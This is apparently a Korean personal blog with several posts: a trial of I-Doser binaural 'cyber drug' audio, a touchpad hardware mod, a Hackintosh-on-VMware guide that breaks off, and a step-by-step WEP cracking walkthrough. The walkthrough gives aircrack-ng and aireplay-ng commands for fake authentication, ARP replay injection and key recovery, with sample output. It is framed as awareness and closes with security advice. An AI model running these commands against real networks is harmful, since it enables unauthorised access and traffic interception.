최근에 인위적인 뇌파조절로 실제로 마약을 사용한듯한 효과를 줄수 있다는 아이도저社에서

서비스 중인 음원을 구해서 체험해봤습니다. 일단 많은 인터넷 신문기사들이 알리는

아이도저의 효능(?)은 다음과 같습니다.

‘아이도저(I-Doser)’라는 사이트를 통해 유통되고 있는 이 사이버 마약은 마음을 평온하게 하는 알파 파장(7∼13헤르츠.Hz)과 지각과 꿈의 경계상태로 불리는 세타파(4∼8Hz), 긴장, 흥분 등의 효과를 내는 베타파(14∼30Hz) 등 각 주파수의 특성을 이용해 사실상 환각 상태에 빠져들게 하는 바이노럴 비트(Binaural Beat) 원리를 이용한 것으로 알려졌다.

아이도저 사이트는 항불안성, 항우울성, 마약성, 진정제, 성적흥분 등 모두 10개 부문으로 나눠 73개의 아이도저 MP3 파일을 제공하고 있다. 특히 마약성 부문에서는 코카인, 헤로인, 마리화나 등 모두 28가지의 마약을 느낄 수 있는 파일이 제공된다. 각 항목을 클릭하면 해당 마약을 흡입한 것과 같은 환각에 빠지게 해준다는 주파수가 10∼45분 가량 흘러나온다.

아이도저 사이트는 “수많은 임상실험을 통과한 제품들이기 때문에 매우 안전하며 해외에서 최고 몇십달러에 판매되고 있다”며 “뇌파를 조정해 실제 마약류의 10분의 1정도에 해당하는 시간만 가상체험 상태가 유지되므로 중독과는 전혀 무관하다”고 주장하고 있다.


사용자 삽입 이미지

저의 경우는 기사가 퍼지기 몇일전쯤 해외사이트를 검색하다가 우연히 아이도저를 알게되었는데

MP3파일로 배포되고 있는곳을 많이 봤습니다. 흔히듣는 MP3의 경우 손실압축포맷을 사용하는데

사람이 청각으로 크게 인식하지 못하는 부분을 버리고 다시 표현한것이라 보시면 되겠습니다.

때문에 이러한 특정 주파수의 영향을 받을수 있는 음원의 경우 MP3으로 재생산했을때 별다른

영향을 못받을수 있다는것인데 어쨋든간에 한번 들어나 보자 싶어서 들어봤습니다.

(참고로 제가 들어본것은 아이도저에서 서비스하고 있는 원음입니다.)

우선 들어본 소감부터..
사용자 삽입 이미지
엠씨스퀘어네..ㅡㅡ;

제가 중학생일때 집에서 당시 40만원에 가까운 돈을 주고 구입한걸로 기억하는 엠씨스퀘어 초기

모델입니다. 지금은 중고로 8만원가량 하네요.. 요놈은 누굴 빌려줬다 잃어버렸는지 이사오면서

없어졌는지 자취를 감춘상태입니다. 엠씨 스퀘어도 아이도저의 마약복용효과처럼 뇌파자극의

효과로 집중력을 높혀주고 숙면을 유도하는 기능이 있다고 알려져 있습니다. 잠시 주제를 벗어나서

엠씨스퀘어에 관한 제 경험은 한 반년간 꾸준히 썼었습니다만 학습기능을 켜도 잠이오고 숙면기능을

켜도 잠이오고...;; 큰 효과를 봤다는 애들도 많은데 나는 뭐가 안맞나 싶어서 외면하다가

결국 어디론가 사라져 버렸네요. (공부잘하고 싶다고 조르고 졸라서 샀다가 없어져서 죽을뻔..ㅡㅡ;)
사용자 삽입 이미지

다시 주제로 돌아와서 아이도저를 체험해보기위해 많이들 들어봤을 마약의 종류인

마리화나를 체험해 보기로 하고 들어봤습니다. (음원의 경우 LSD,코카인,헤로인,진통제,각성제
 
 항우울제,불안방지 등의 효과를 느낄수 있게 구성되어 있습니다.)

.....?

해외 유저들사이에선 의견이 분분한데 어떤 사람들은 '큰 효과가 있었다' 어떤 사람들은 '뭐야 이거'

등등 다양했습니다. 어떤 사람은 아예 어떤 곡을 들었을때 떵 마렵다고하기도.. ㅋㅋㅋㅋ

여러번 들어봐야 느낌을 받을수 있다고 하고 스피커보다는 이어폰으로 들어야 효과가 있다고 해서

스무번쯤 들어봤지만.. 결과는 똑같더군요. 어떤사람들은 어떤 파일을 듣다보니 온몸이 짜릿해지는

기분이 든다고 하기도 하는데 결국 개인적인 차이가 큰것 같습니다. 저의 경우에는 별다른 효과를

못느꼈지만 이러한 사이버마약이 서비스 되고 있다는것은 상당히 위험하다고 생각합니다.

전문가가 아니라서 딱히 어느점이 좋지 않다라고 꼬집을수는 없지만 성인보다는 어린학생들에게는

위험할수도 있겠다는 생각이 들더군요.

사용자 삽입 이미지

난데없이 왠 포켓몬스터냐 할수 있는데 예전 97년도 후반에 일본에서 TV로 방영되는 포켓몬시리즈를

방청하던 어린이들이 기절이나 경련을 일으켜서 병원에 실려가는 사태가 생긴적이 있었습니다.

찾아본 기사에서는 전국 23개 지역에서 550명 이상에게 이런일이 생겼는데 이는 폭발신에서

빨강,파랑,흰색으로 5초간 100회이상의 빛이 점멸하는 색채교차로 긴박감을 높히는 기법과 강한

빛을 방사시키는 기법을 조화하는 연출방식때문이었다고 합니다. 이 사건만봐서는 시각적인

부분에서만 문제가 발생한것이 아니냐 할수있겠지만 어느정도 과장은 섞였을지 몰라도 글루미

선데이라는 곡을 듣고 자살한 사람들을 보면 음향이 미치는 효과도 어느정도 존재하지

않은가 싶습니다. 뇌파를 자극하는 엠씨스퀘어의 효과가 개인별로 다르듯 아이도저의 효과도

사람마다 다를것이고 효과를 얻을수 있는 사용자중에 어린학생들이 있다면 큰 문제가 아닐까

싶습니다. 저도 어릴적 그랬고 하지말라고 혼내도 걸레에 엎어져 자고 있는 우리집 강아지도 그렇고

다른 많은분들도 어릴적에 하지말라는건 골라서 하고싶어했던 심리가 지금 아이들이라고 다르지

않을텐데 아직 뇌의 성장이 끝나지 않은 어린학생들이 아이도저의 영향을 받지나 않을까 싶어

걱정스럽습니다. 인터넷에서 아이도저를 구할수 있는방법을 모두 막을수는 없겠지만 적어도

국내의 웹하드등을 통해 퍼지고 있는 이런 사이버 마약은 모두 규제가 됐으면 하는 바램이네요.
신고
인터넷 혹은 컴퓨터 몇대간의 근거리 통신망은 갈수록 우리생활에서 떼놓기 어려운 존재가

되가고 있습니다. 2000년 초반부터 급격히 유선 인터넷망이 성장해오면서 KT에서 내놓은 무선

인터넷 서비스인 네스팟이 출현했었는데요. 우리나라의 경우 다른 큰 국가들에 비해 토지면적이 작기

때문에 유선망이 워낙에 잘되있어서 네스팟이 빛을 발휘하지 못하고 있습니다. (대학교를 중심으로

많이 설치됐었는데 이또한 제가 보기엔 찬밥신세를 면하지 못하는듯 싶네요.) 지금의 경우

서울,수도권지역은 와이브로서비스로 원활한 인터넷 서비스를 즐길수는 있지만 문제는 금액이죠.

집에서 하루종일 켜놓고 인터넷 쓰는것 처럼 와이브로 서비스를 사용한다면 집안 거덜낼수

있습니다. 사설이 좀 길어졌는데 이렇게 무선인터넷망도 조금씩 발전해오면서 몇년전부터

가정에서 무선인터넷 서비스를 이용하는 경우가 많아지고 있습니다. 그리고 집에 컴퓨터가

두대 이상인 가정이 생겨나면서 자연스레 유무선공유기도 많이 사용되고 있는데요.

그래서 무선인터넷이 왜 아직은 보안상의 문제가 있는지 써보려 합니다.

현재 무선통신시 많이 사용되는 암호화 프로토콜로는 WEP(Wired Equivalent Privacy)와 WPA

(Wifi Protected Access)등이 있습니다. 이 두 프로토콜의 개념등은 저도 네트워크 분야로는

자세히 모를뿐더러 이글의 주제와는 별상관이 없으니 그냥 '이런게 있구나' 라고만

알아두시면 됩니다. 이글에서는 WEP 프로토콜의 위험성에 대해 쓰겠습니다.

구글등에서 WEP해킹 또는 WPA해킹등으로 검색해보면 수많은 해킹관련 자료와 문서들을

볼수있습니다. 여기서 말하는 WEP해킹이나 WPA해킹으로 여러가지 피해가 발생할수 있겠지만

가장 간단한 피해로는 AP(Access Point)공유를 들수있겠습니다. 쉽게 내가 쓰고있는 무선인터넷

서비스를 누군가에게 공유하려는 생각이 없는데 누군가 같이 쓰고있다는것입니다. 이중에서

WEP해킹의 경우 명령어 몇줄만 쓰면 손쉽게 해킹이 가능합니다. 그래서 직접 시도해봤습니다.

캡쳐화면등은 일부러 전혀 남기지 않았고 인터넷에서 쉽게 찾아볼수 있는 자료를 붙혀넣기

했습니다. 원본출처 : http://skyfac.com (빨간글씨로 저의 의견등을 쓰겠습니다.)

(사용된 도구 : Eee PC 701(802.11b/g Atheros wireless lan),
Backtracks 3 Live CD(각종 네트워킹 관련툴이 포함된 Slackware 기반의 리눅스)

(수행하기전 자신의 무선네트워크 카드가 airsnort등의 프로그램을 지원하는지 확인해야합니다.
대부분 지원하는것으로 알고있는데 모델명만 약간 달라도 지원하지 않는경우가 더러 있다고하네요.)

사용자 삽입 이미지
Backtrack은 USB로 Live CD를 간단히 만들수가 있습니다.

실험에 앞서 일단 back track은 해킹툴 패키지가 아닙니다. 각종 네트워크툴을 모아놓은
보안관리툴이라고 보는것이 맞을듯 싶네요. 그리고 부디 악용하지 마시기 바랍니다.
사용시 생길수 있는 문제나 불이익등은 모두 개인에게 책임이 있습니다.
-----------------------------------------------------------------------------------------

AP의 WEB Key를 크래킹 하기 위해서는 수많은 양의 IVs(Initialization Vectors)를 모아야 한다. 평상시의 경우에는 이러한 IVs들이 빨리 생성되지 않는다. 만약 인내심이 많은 사람이라면 단지 네트워크의 트래픽을 저장하는 것 만으로도 WEB Key를 크래킹하기 위한 충분한 양의 IVs를 모을 수 있다. 하지만 이 글을 읽고 있는 대부분의 사람들은 이것을 참지 못할 것이기 때문에 Injectino이라고 부르는 기술을 사용할 것이다. Injection 기법은 AP에 보낸 패킷을 계속해서 빠르게 재전송하기 때문에 많은 수의 IVs를 짧은 시간내에 얻을 수 있다.



WEB Key를 크래킹 하기 위한 기본적은 단계는 다음과 같다.
  1. 무선랜을 모니터(monitor) 모드로 변경하기.
  2. aireplay-ng를 이용하여 AP에 가짜 인증(authentication) 하기.
  3. BSSID필터를 이용해 특정 AP 채널의 IVs 값들을 수집하기.
  4. aireply-ng의 ARP request replay 모드를 이용하여 패킷 주입하기.
  5. aircrack-ng를 이용하여 수집된 IVs 패킷 크래킹하기.


1단계 - 무선랜을 모니터(monitor) 모드로 변경하기

  먼저 랜카드를 '모니터' 모드로 변경하기 위해 이 단계를 실시한다. 모니터 모드란 공기 중에 흐르고 있는 모든 무선 패킷들을 랜카드가 수집(listen)할 수 있는 상태를 말한다. 보통의 경우에 랜카드는 모든 패킷기 아닌 자기 자신에게 오는 패킷만 받아들인다. 즉 모니터 모드는 패킷을 주입할 수 있도록 해 주는 단계이다.(참고: 아래의 과정은 Atheros 카드가 아닐 경우 다를 수 있다.)

먼저 ath0을 정지한다.

airmon-ng stop ath0


다음과 같이 나타난다.

Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)


athX 인터페이스가 없는지 재확인 하기 위해 "iwconfig" 명령어를 이용한다.

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.


만약 다른 종류의 athX가 남아 있다면 정지시키기 바란다.

이제, 랜카드를 채널 9에 모니터 모드로 변경시키기 위해 다음과 같이 입력한다.

airmon-ng start wifi0 9

Note : 이 명령에서는 우리가 사용하는 ath0대신 wifi0을 사용했는데 이는 madwife-ng 드라이버가 이미 사용중이기 때문이다.

다음과 같은 화면이 출력될 것이다.

Interface             Chipset             Driver
 wifi0           Atheros         madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
(monitor mode enabled)


 

이제 ath0이 모니터 모드로 변경되었다. iwconfig 명령을 통해 확인해 볼 수 있다.
  lo            no wireless extensions.
 wifi0     no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


2단계 - aireplay-ng를 이용하여 AP에 가짜 인증(authentication) 하기.

  이 단계에서는 생성된 IVs를 수집한다. 새로운 콘솔(console)을 열어서 다음과 같이 입력한다.

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0


 

  • -c는 무선 네트워크의 채널을 의미한다. 이는 사용자의 환경에 따라 적절히 변경되어야 한다.
  • --bssid는 공격하고자 하는 AP의 MAC 주소를 의미한다.
  • -w는 IVs들이 담길 파일 이름을 지정한다.
  • ath0은 인터페이스 이름이다.

  그런데 이 명령을 수행하기 전에 먼저 bssid를 알아내야 한다. bssid 즉 공격하고자 하는 AP의 MAC주소는 다음과 같은 명령을 통해 확인할 수 있다. 또한 이 명령은 Injectino이 제대로 작동하는지 테스트 하는 명령이기도 하다.

aireplay-ng -9 ath0


시스템에 다음과 같은 화면이 출력된다.

 16:29:41  ath0 channel: 9
 16:29:41  Trying broadcast probe requests...
 16:29:41  Injection is working!
 16:29:42  Found 5 APs
 
 16:29:42  Trying directed probe requests...
 16:29:42  00:09:5B:5C:CD:2A - channel: 11 - 'NETGEAR'
 16:29:48  0/30: 0%
 16:29:48  00:14:BF:A8:65:AC - channel: 9 - 'title'
 16:29:54  0/30: 0%
 16:29:54  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
 16:29:55  Ping (min/avg/max): 2.763ms/4.190ms/8.159ms
 16:29:55  27/30: 90%
 16:29:55  00:C0:49:E2:C4:39 - channel: 11 - 'mossy'
 16:30:01  0/30: 0%
 16:30:01  00:0F:66:C3:14:4E - channel: 9 - 'tupper'
 16:30:07  0/30: 0%


위의 화면에서 볼 수 있듯이 BSSID 들이 AP별로 출력되고 있다.

다시 2단계의 명령으로 돌아가 보자. Injection이 발생하면 다음과 같은 화면을 볼 수 있다.

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                          
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782



3단계 - BSSID필터를 이용해 특정 AP 채널의 IVs 값들을 수집하기.

AP가 패킷을 받아들이기 위해서는 반드시 대상 MAC 주소와 연결이 이루어져야 한다. 만약 대상 MAC주소와 연결이 이루어져있지 않은 상태에서 패킷을 보낸다면 AP는 패킷을 무시하고 대신 DeAuthentication 패킷을 반출한다. 이런 경우에는 AP가 주입된(Injected) 모든 패킷을 무시하므로 새로운 IVs가 발생되지 않는다.

  Injectino이 실패하는 가장 큰 이유 중 하나가 바로 AP와의 연결(Association)이 이루어지지 않았기 때문이다. 따라서 반드시 다음을 사항을 잊지마라 : Injection을 하고자 하는 AP의 주소는 가짜 인증(fake authentication)이나 벌써 연결된 클라이언트를 이용하여 반드시 연결되어야 한다.

AP와 연결하기 위해 다음과 같은 가짜 인증 명령을 내보낸다.

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0


 

  • -1은 fake authentication을 의미한다.
  • 0은 초당 재연결 시간을 의미한다.
  • -e teddy는 무선 네트워크 이름을 의미한다.
  • -a 00:14:6C:7E:40:80은 AP의 MAC 주소를 의미한다.
  • -h 00:0F:B5:88:AC:82는 자신의 랜카드 MAC 주소를 의미한다.
  • ath0은 무선 네트워크 interface 이름이다.


가짜 인증이 성공하면 다음과 같이 출력된다.

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)



4단계 - aireply-ng의 ARP request replay 모드를 이용하여 패킷 주입하기.

  이 단계는 aireplay-ng를 이용하여 ARP request를 네트워크에 재주입시키는 과정이다. ARP request를 재주입하는 이유는 AP는 보통 ARP request를 받으면 새로운 IV를 생성하여 반출하기 때문이다. 이를 통해 우리는 짧은 시간내에 많은 양의 IVs를 수집할 수 있게 된다.

새로운 콘솔을 실행한 후 다음 명령을 입력한다.

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0


ARP request가 주입되기 시작하면 다음과 같은 화면이 출력된다.

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


처음에는 Read의 packets 수만 올라가고 ARP requests를 받는 데 시간이 좀 걸릴 수 있다. 일정시간이 지나고 나면 위의 내용처럼 숫자들이 올라가기 시작한다.

airodump-ng가 실행되고 있는 콘솔을 보면 Injecting이 잘 이루어지고 있는지 확인할 수 있다. 데이터 패킷의 수가 급격하게 증가하고 있을 것이다.


5단계 - aircrack-ng를 이용하여 수집된 IVs 패킷 크래킹하기.

이제 남은 것은 수집된 IVs 정보를 이용해 WEP 키를 추출하는 것이다. 새로운 콘솔을 실행한 뒤 아래와 같이 입력해보자.

aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
  • -z는 PTW WEP-cracking 방법을 이용한다는 뜻이다.
  • -b 00:14:6C:7E:40:80는 공격의 대상이 되는 AP의 MAC 주소이다.
  • output*.cap는 output으로 시작하면서 확장자가 cap인 모든 파일을 의미한다.


지금까지의 모든 과정이 순조롭게 이루어졌다면 WEP 키는 금방 찾아낼 수 있다. 이를 위해서는 대략 64비트일 때는 250,000개의 IVs, 128비트일 때는 1,500,000개의 IVs가 필요하다. PTW 공격방법을 사용한다면 20,000 패킷(64비트)에서 40,000~85000 패킷(128비트)이 필요하다. 이는 매우 대략적이기 때문에 상황에 따라 필요한 패킷이나 IVs는 달라질 수 있다.

WEP 키를 얻는 데 성공했다면 다음과 같은 화면이 나타날 것이다.

(신호가 약할경우 IVs를 모으는데 시간이 많이 걸릴뿐더러 제대로 모이지가 않습니다.
제 경우에는 첫시도 장소에서 신호가 약해 다른 강한신호가 잡히는곳에서 시도해서 성공했습니다.)

Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(
  0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)
 
                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%


참고사항

  • 위의 문서는 아래 참고 문서의 일부분을 번역하여 옮긴 것이며 필자가 직접 작성한 부분도 있습니다.
  • 위의 문서는 WEP와 관련하여 무선 네트워크에 대한 보안 위협을 인식하기 위함이지 다른 네트워크를 침투하여 타인에게 피해를 입히기 위함이 아닙니다.
  • 위의 문서 내용으로 인해 발생한 모든 사고 및 손해 등에 대해서 필자는 절대 책임지지 않습니다.


* Reference

  1. http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
  2. http://www.aircrack-ng.org/doku.php?id=injection_test

------------------------------------------------------------------------------------

위와같이 간단한 명령어 몇줄만으로 WEP키를 알아내서 암호화 되있는 어떤 AP를 공유해서

인터넷을 쓰는것이 가능해집니다. WPA해킹의 경우 시도해보지는 않았으나 WPA또한 이런

BackTrack등을 사용해서 해킹하는 방법을 손쉽게 찾아볼수 있기때문에 완전한 해결책이

될수는 없습니다. 게다가 암호화 방식은 하드웨어적으로 지원을 하는것인데 비교적 구형

무선랜카드를 사용한다면 WEP방식의 암호화를 사용합니다. 요새는 WPA2방식까지

암호화 방법을 선택할수 있는 기기들이 많이 출시되고 있습니다.

사용자 삽입 이미지

문제는 이러한 기기들이 아무곳에서나 편리하게 사용될수 있다는것인데 개인적으로 가정에서

사용하는것에는 큰 피해를 체감할수 없겠지만 기업체나 공공기관에서는 수많은 개인정보나

기업정보가 유출될수 있습니다. 위에서 들었던 예는 단순히 AP만을 공유해서 무선인터넷을

공짜로 쓰는데에만 촛점이 맞춰져있지만 더 큰 피해도 생길수가 있습니다. 예를 들면 주민등록

번호나 웹사이트 ID,비밀번호등이 유출될수 있겠죠. 어쨋든 개인적인 문제로 촛점을 맞추면 누구던지

허락하지 않았는데 누군가 내것을 막쓰고 있다면 불쾌할겁니다. 지금 무선인터넷 서비스를

쓰고 계신분들은 이런점들이 있구나하는것을 염두해 두시고 WEP방식을 쓰시는분들은 반드시

WEP키를 자주 변경하신다던지 하셔야겠고 WPA방식을 쓰시는분들도 자주 키를 변경하시는것이

좋을듯 싶습니다. 그리고 가급적이면 인터넷 뱅킹 서비스를 무선으로 사용하지 마시길 바랍니다.

제 경우엔 무선으로 이러한 서비스를 이용하진 않지만 유선으로 사용하는 인터넷뱅킹 계좌도

소액만 예금되있고 소액결제에만 사용하고 있습니다. 어쨋든.. 이런 위험한 요소들이 무선인터넷

사용시 항시 따라다니고 있으니 사용하시는분들은 한번씩 자신이 쓰고있는 무선랜 보안환경에

약간 신경을 써보는것이 좋을듯 싶습니다.

신고

구형 노트북인 센스 600을 모조리 뜯어서 1주일 전쯤 LCD모니터를 하나 만들었습니다. 분해할때

여러가지 잘못 건드려서인지 메인보드가 제대로 작동을 안하더군요.. 전원은 들어오는데 아무

반응이 없습니다. 어짜피 워낙 구형이라 메인보드를 팔수도 없고.. 그나마 재활용 가능한 부품은

터치패드, 전원부PCB, 배터리 충전부 PCB였는데 전자쪽을 전공한적이 없어서 제일 쉽게 해볼것을

찾다가 터치패드를 개조하기로 했습니다. 결과부터 말하자면 정말 쉬웠습니다. 기초지식도

필요없거든요. 물론 모두 통용되는 방법은 아닙니다. 센스 500이나 기타 여러 노트북들은 다른방식을

취합니다. 이 글은 센스 600을 버리긴 아깝고 부품을 재활용 해보자 하시는 분들에게

도움이 될수 있겠습니다.

사용자 삽입 이미지


분해 방법등은 생략하겠습니다. 터치패드쪽은 일단 본체가 분해되면 팜레스트 안쪽 가운데에

위치해 있어서 가장 분해가 쉬운 부분입니다. Synaptics社의 터치패드를 사용하는데

모델명은 TM1202SPU입니다.

사용자 삽입 이미지

오늘의 희생양이 될 마우스입니다. PS/2마우스로 개조할것이므로 선만 짜릅니다.

길이를 고려해서  니퍼나 가위로 잘라주면 됩니다.

사용자 삽입 이미지

어디서 줏은지도 까먹은 옛날 현주컴퓨터 아이프렌드 컴퓨터에 붙어있던 볼마우스네요..

인식률이 많이 안좋아서 쓸일은 없겠지만 혹시 급할때 쓸일 있을지 몰라서 전선을 바싹 당겨서

자르진 않았습니다.

사용자 삽입 이미지

터치패드를 분리하면 윗부분은 터치패드 아랫부분은 버튼부분 입니다. 보시는대로 이 케이블이

원래는 메인보드와 연결되는데 메인보드 쪽은 떼어버리거나 니퍼등으로 잘라줍니다.

메인보드를 써먹을 일이 있으신분들은 아무래도 케이블을 좀 길게 잘라서 보관해야겠죠.

위 사진처럼 맨위 빨간선,하얀선,노란선, 맨아래의 하얀선을 제외하고 모두 잘라버립니다.

자르지 않고 작업해도 상관없지만 거추장 스러우니까요.

사용자 삽입 이미지


위에서 잘랐던 PS/2 마우스선과 밑에서 잘랐던 터치패드의 선들을 이렇게 이어줍니다.

PS/2 마우스선은 차례대로 녹색→GND, 파란색→5v Power, 흰색→CLK, 주황색→데이터 입니다.

터치패드 선의 경우 바로 위 그림순서대로 흰색→GND, 노란색→데이터, 흰색→CLK 빨간색→Power

입니다. 물론 이런것을 알 필요는 없습니다. 저또한 전자쪽 전공이 아니라 무지에 가깝구요.

이렇게 니퍼등으로 끝쪽 전선을 따서 가연결 시킨뒤 부팅한뒤에 마우스를 인식하는지 확인해

봅니다. 최근 메인보드에도 PS/2 소켓이 있는지 모르겠네요.. PS/2 to USB젠더로 인식가능한지

확인못해봤는데 그렇게는 안될듯 싶습니다.

사용자 삽입 이미지

인두는 없는데 납은 있어서 라이터불로 지져서 살짝 떨궈서 납땜을 해줬습니다. 영 지저분하네요.

사용자 삽입 이미지

한가닥씩 절연을 위해 스카치 테이프로 감싸주고 케이블타이로 고정시켜줬습니다.

사용자 삽입 이미지

이제 케이스를 만들어야겠죠. 원래 본체의 터치패드 부위를 아예 절단해버리면 이렇게 안해도

깔끔한데 없으니 어쩔수 없죠. 부품통을 뒤지다 보니 예전 3.5' 디스켓 보관함이 눈에 띄길래

잡고 모양맞춰 칼로 잘랐습니다. 손으로 하니 삐뚤하지만 별로 티 안납니다. ㅋㅋ

사용자 삽입 이미지

케이스안에 넣고 안쪽에서 나사를 박아 고정시켜줬습니다.

사용자 삽입 이미지

모두 마친후의 작업환경.. 여전히 너무 너저분 하네요 ㅡㅡ; 개방형은 모니터도 그렇고 지저분해

보여서 아크릴 케이스 만드려고 알아보니 아크릴이 겁나게 비싸서 못사겠습니다..;; 어쨋든

터치패드를 쓰니 마우스쓸때는 왼손으로 움직이면 뭔가 어색해서 잘 못썼는데 전혀 그렇지가

않네요. Synaptics 터치패드 유틸리티를 설치하고 고급설정을 해주면 가상 스크롤이나 키설정으로

터치패드 자체만으로 마우스키를 사용할수있는데 구하기 쉽습니다. 저 거슬리는 키보드도

노트북 키보드를 개조해서 바꾸고 싶은데 방법도 너무 어렵고 키 맵핑때문에 키보드가 두개가

필요해서 차라리 미니키보드 하나 새로 사는게 낫겠더군요. 하지만 다운로더에 돈들이고 싶진

않기때문에 패스.. 그리고 CDROM도 젠더사서 써먹을수 있으니 젠더를 하나 사야겠습니다.

아무튼 터치패드 만들기 참 쉽죠?^^

사용자 삽입 이미지

칼질하다 잠시 쉬는사이 놀아달라고 보채는 우리 멍멍이 ㅋㅋ
신고
06년경부터 외국사이트등에서 Mac osx를 해킹해서 x86 일반 PC에 설치하는 방법등이 알려지고

있습니다. 애플 社주관으로 PC에 Mac os를 설치하는 대회같은것도 있기도 했죠. 일단 Mac 자체가

일반PC와는 달리 바이오스를 사용하지 않고 EFI라는 것을 사용하기 때문에 그냥 DVD만 넣는다고

해서 설치가 되진 않고 가장 문제는 하드웨어적 문제인데 지금은 꽤 많은 부분이 해킨토시 이용자

들을 통해 패치가 이뤄져서 설치가 잘 되는 편입니다. 아무래도 Mac os의 편리함이나 디자인등에

매료되서 PC사용자들이 최근에 많이 시도해보는것 같은데 저 또한 인터페이스나 디자인이 마음에

들어 꽤전에 시도해보다가 특정 하드웨어 몇개가 죽어도 잡히질 않아 때려쳤던 기억이 나네요.

몇일전에 윈도우XP용 테마를 찾다가 osx 레오파드를 보고 다시한번 시도해 보기로 마음을

먹었습니다. 대개 많은 해킨토시 이용자분들이 XP나 비스타와 osx를 멀티부팅 하는 방법이나

Vmware로 설치해서 사용하는것으로 아는데 여기서는 가장 부담없는 Vmware를 통해 설치하는

방법을 알아보겠습니다. (사실은..귀찮아서...;)

1. VMware 셋팅

사용자 삽입 이미지

VMware를 설치하기전 자신의 하드웨어가 다운로드한 Mac os에서 지원하는지 확인해야합니다.

과거 해킨토시는 AMD CPU에서 설치하기 매우 힘든경우가 많았지만 최근에는 AMD CPU도

잘 되는것으로 알고있습니다. 인텔 CPU의 경우 SSE3을 지원해야 설치가능합니다. 위와같이

CPU-Z같은 프로그램으로 자신의 CPU를 확인합니다. 왠만한 사양의 CPU를 쓰고있는 분들은

SSE3을 지원합니다.

사용자 삽입 이미지

설치가 이뤄질 VMware의 가상PC를 설정합니다. File→new→Virtual Machine을 선택해서

다음과 같이 Custom을 선택해줍니다.

사용자 삽입 이미지

여기서는 Vmware 6.5를 사용했습니다. 6.0을 사용해도 무방합니다. Hardware Compatibility에서

5와 호환되게 하면 많은 제약이 따르므로 기본값으로 놔두고 Next를 눌러줍니다.

사용자 삽입 이미지

Vmware 6.0에서와 달리 6.5에서는 OS를 인스톨할 CD나 DVD,ISO이미지 여부를 묻습니다.

추후에 수정가능하므로 맨 아래를 선택하고 Next를 눌러줍니다.

사용자 삽입 이미지

어떤 OS가 설치될것인지 묻게되는데 위와같이 설정해주고 Next를 눌러줍니다.

사용자 삽입 이미지

버추얼머신의 이름을 써주는 칸에 맘에드는 이름을 아무렇게나 입력해주고 머신이 저장되는

파일이 저장될 디렉토리를 지정해줍니다.

사용자 삽입 이미지

코어가 두개이상인 CPU의 경우 선택해주는 부분입니다. 쿼드코어 사용자도 Two로 선택하면됩니다.

저의 경우는 P4 프레스캇 싱글코어라 One을 선택했습니다.

사용자 삽입 이미지

메모리 설정 부분입니다. 글을 쓰기전 미리 설치해본결과 2Gb나 1Gb나 가벼운 작업시 별로 큰

차이는 없었습니다. 1Gb정도만 설정해주고 부족하다 싶으면 나중에 수정해주면 됩니다.

사용자 삽입 이미지

네트워크 설정 부분입니다. 공유기를 쓰신다면 Bridge 네트워크를 이용해야 될수 있습니다만

NAT가 가능하다면 NAT로 설정하는것이 편합니다.

사용자 삽입 이미지
어댑터 타입을 물어보는데 LSI Logic을 사용합니다. Bus Logic을 사용해도 Vmware상에서

성능상 많은 차이를 보이진 않습니다.

사용자 삽입 이미지

이제 버추얼머신에서 HDD처럼 쓰일 파일을 만들게 됩니다. 맨 아래를 선택하면 실제 HDD를

사용하게 되는데 여유로운 HDD를 가지고 계신분이라면 더욱 나은 성능을 위해 실제 HDD를

사용하시는것도 괜찮은 방법입니다. 다만 이경우 실제 HDD의 전체를 사용하게 되므로

반드시 남는 HDD를 사용하시기 바랍니다.

사용자 삽입 이미지

디스크 타입을 묻는데 SCSI로 설정시 인식하지 못할때가 있습니다. 여기서는 IDE로 설정하지만

SCSI로 설정시 이상 없으신 분들은 SCSI로 설정하시기 바랍니다.

사용자 삽입 이미지

디스크의 전체 용량을 지정해 줍니다. osx 10.4.9를 설치하면 대략 6.8Gb정도의 용량이 소요됩니다.

실제로 osx를 활용하실분은 20~30Gb정도 설정해 주셔야 여러 프로그램도 설치하고 편하게 사용

